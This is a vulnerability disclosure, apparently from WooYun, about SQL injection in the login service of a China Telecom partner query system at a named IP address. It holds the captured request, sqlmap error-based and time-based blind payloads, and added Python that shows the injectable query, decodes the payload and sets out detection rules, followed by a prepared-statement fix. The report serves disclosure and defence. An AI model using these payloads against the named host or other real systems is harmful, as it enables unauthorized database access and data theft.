
SQL injection in a China Telecom nationwide networked business query system

2015-06-30 01:15

URL: http://118.85.207.145:8080/security/authen

China Telecom nationwide networked voice information (声讯) service partner query system

[Screenshot: QQ截图20150509174710.jpg]





The login form is vulnerable to POST injection. The login request, as captured:

```http
POST http://118.85.207.145:8080/eapsoa/AjaxAdapter HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://118.85.207.145:8080/security/authen
Content-Type: application/x-www-form-urlencoded;
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: 118.85.207.145:8080
Content-Length: 241
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=D0A68C8EB1EEB02034D4285B9885E97D; STICK_EAP_TOKEN=OPENEAP_NODE_NAME.

<service> <serviceID>SYS_USER_LOGIN_CHECK</serviceID> <parameters><parameter index="1" type="string">admin</parameter><parameter index="2" type="string">admin</parameter><parameter index="3" type="string"></parameter></parameters> </service>
```

Note that the body is a raw XML service envelope even though the Content-Type header says form-urlencoded. The injectable value is parameter index 1 (the username) of the SYS_USER_LOGIN_CHECK service: whatever text sits inside that element reaches the database query unchanged.
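As an added example (not code from the report or from the affected system), the Python below shows how a login check fed from this envelope becomes injectable when the parameter text is concatenated into the SQL string, beside the bound-parameter form that closes the hole. The sys_user table, its columns and the sqlite3 backend are assumptions; the real backend is Microsoft SQL Server, so the CONVERT and WAITFOR payloads from the report are replaced here by a plain boolean differential (`1=1` versus `1=2`) terminated with `--`, the same way the time-based payload ends.

```python
# Added example, not code from the WooYun report or from the affected system.
# sqlite3 stands in for the Microsoft SQL Server backend sqlmap identified;
# the sys_user table and its columns are assumptions.
import sqlite3
import xml.etree.ElementTree as ET

# Constructed request body with the same shape as the captured one; {user} and
# {pwd} are filled in per attempt (the payloads used here contain no < or &,
# so no XML escaping is needed).
LOGIN_XML = (
    '<service> <serviceID>SYS_USER_LOGIN_CHECK</serviceID> <parameters>'
    '<parameter index="1" type="string">{user}</parameter>'
    '<parameter index="2" type="string">{pwd}</parameter>'
    '<parameter index="3" type="string"></parameter></parameters> </service>'
)


def parse_service(xml_text):
    """Return (serviceID, {index: value}) from a <service> envelope."""
    root = ET.fromstring(xml_text)
    params = {
        int(p.get("index")): (p.text or "")
        for p in root.find("parameters").findall("parameter")
    }
    return root.findtext("serviceID"), params


def make_db():
    """In-memory stand-in for the user table (assumed schema, constructed row)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sys_user (username TEXT, password TEXT)")
    conn.execute("INSERT INTO sys_user VALUES ('admin', 's3cret')")
    return conn


def login_vulnerable(conn, xml_text):
    """Concatenation: parameter 1 is spliced straight into the WHERE clause, so a
    quote inside it ends the string literal and the rest is parsed as SQL."""
    _, p = parse_service(xml_text)
    sql = ("SELECT COUNT(*) FROM sys_user WHERE username='%s' AND password='%s'"
           % (p[1], p[2]))
    return conn.execute(sql).fetchone()[0]


def login_safe(conn, xml_text):
    """Bound parameters: the same text is compared as a username, never parsed."""
    _, p = parse_service(xml_text)
    sql = "SELECT COUNT(*) FROM sys_user WHERE username=? AND password=?"
    return conn.execute(sql, (p[1], p[2])).fetchone()[0]


def attempt(conn, check, user, pwd):
    """Submit one credential pair through `check` and return the matching row count."""
    return check(conn, LOGIN_XML.format(user=user, pwd=pwd))


if __name__ == "__main__":
    db = make_db()
    # Boolean differential: the attacker does not know the password, but the
    # comment terminator discards the password check, so the row count now
    # depends only on the injected condition.
    for cond in ("1=1", "1=2"):
        user = "admin' AND %s --" % cond
        print(cond, "vulnerable:", attempt(db, login_vulnerable, user, "admin"),
              "safe:", attempt(db, login_safe, user, "admin"))
```

The vulnerable path returns 1 for `1=1` and 0 for `1=2` with a wrong password, which is exactly the true/false oracle sqlmap turns into data extraction; the bound-parameter path returns 0 for both while still accepting the genuine credentials.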

Proof of vulnerability (sqlmap output; `#2*` is sqlmap's label for the custom injection point marked inside the POST body):

```text
---
Parameter: XML (generic) #2* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: <service> <serviceID>SYS_USER_LOGIN_CHECK</serviceID> <parameters><parameter index="1" type="string">admin' AND 4010=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4010=4010) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(98)+CHAR(113))) AND 'akTN'='akTN</parameter><parameter index="2" type="string">admin</parameter><parameter index="3" type="string"></parameter></parameters> </service>

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: <service> <serviceID>SYS_USER_LOGIN_CHECK</serviceID> <parameters><parameter index="1" type="string">admin' WAITFOR DELAY '0:0:6'--</parameter><parameter index="2" type="string">admin</parameter><parameter index="3" type="string"></parameter></parameters> </service>
---
```
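Two things in that output are worth working through. The CHAR() runs in the error-based payload spell the marker strings "qpzbq" and "qkbbq"; between them the CASE expression yields "1" (CHAR(49)) when the condition holds and "0" (CHAR(48)) when it does not. CONVERT(INT, ...) cannot cast that string, and SQL Server's conversion error quotes the offending value, so the response to a failed login carries the answer back to sqlmap. The time-based payload needs no error at all: a six-second WAITFOR DELAY in the response time is the signal. As an added example (not code from the report or from sqlmap), the Python below decodes the markers, builds the string the cast is asked to convert, reads the leaked value back out of a constructed error line written in SQL Server's wording, and applies the same payload features as detection rules to parameter values.

```python
# Added example, not code from the WooYun report or from sqlmap. The error
# message is constructed here in the wording SQL Server uses for a failed cast.
import re

# The two parameter-1 values from the sqlmap proof above.
ERROR_PAYLOAD = (
    "admin' AND 4010=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)"
    "+(SELECT (CASE WHEN (4010=4010) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(98)+CHAR(113))) AND 'akTN'='akTN"
)
TIME_PAYLOAD = "admin' WAITFOR DELAY '0:0:6'--"

CHAR_RUN = re.compile(r"(?:CHAR\(\d+\)\+?)+")  # CHAR(113)+CHAR(112)+... up to a non-CHAR token


def decode_char_run(run):
    """'CHAR(113)+CHAR(112)' -> 'qp'."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", run))


def markers(payload):
    """The prefix and suffix strings sqlmap wraps the extracted value in."""
    runs = [decode_char_run(m.group(0)) for m in CHAR_RUN.finditer(payload)]
    return runs[0], runs[-1]


def convert_error(payload, condition_true):
    """Constructed imitation of the error the payload provokes: the CASE gives
    '1' or '0', the concatenation is not numeric, CONVERT(INT, ...) fails and
    the message quotes the string it could not convert."""
    prefix, suffix = markers(payload)
    value = prefix + ("1" if condition_true else "0") + suffix
    return ("Conversion failed when converting the varchar value '%s' "
            "to data type int." % value)


def leaked_value(error_text, prefix, suffix):
    """What sqlmap reads: the text between the two markers in the error."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_text)
    return m.group(1) if m else None


# Detection rules derived from the payload features (assumed names).
INDICATORS = {
    "quote breakout": re.compile(r"'\s*(?:AND|OR|UNION|WAITFOR)\b", re.I),
    "comment terminator": re.compile(r"--\s*$"),
    "time delay": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "error-based cast": re.compile(r"\bCONVERT\s*\(\s*INT\b", re.I),
    "CHAR() obfuscation": re.compile(r"\bCHAR\(\d+\)", re.I),
}


def suspicious(value):
    """Names of the indicators a parameter value triggers (empty for benign input)."""
    return [name for name, rx in INDICATORS.items() if rx.search(value)]


if __name__ == "__main__":
    pre, suf = markers(ERROR_PAYLOAD)
    print("markers:", pre, suf)
    for truth in (True, False):
        err = convert_error(ERROR_PAYLOAD, truth)
        print(err, "->", leaked_value(err, pre, suf))
    for v in ("admin", ERROR_PAYLOAD, TIME_PAYLOAD):
        print(repr(v[:30]), suspicious(v))
```

Matching on the markers rather than on the whole message is what makes the technique robust to locale and wording differences in the database error; the same property makes a pair of five-letter random strings around a digit a useful thing to search for when triaging web server or application logs after the fact.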



[Screenshots: QQ截图20150509174950.jpg, QQ截图20150509175017.jpg]

Fix:

Do not build the SQL statement by concatenating the parameter values taken from the XML envelope; pass them as bound parameters of a prepared statement instead. Input filtering can be added as defence in depth but is not a sufficient fix on its own. Database error messages should also not be returned to the client, since the error-based payload above depends on them.

Source: www.wooyun.org/bugs/wooyun-2015-0113085

Reads: 105595 | Comments: 0 | Tags: injection
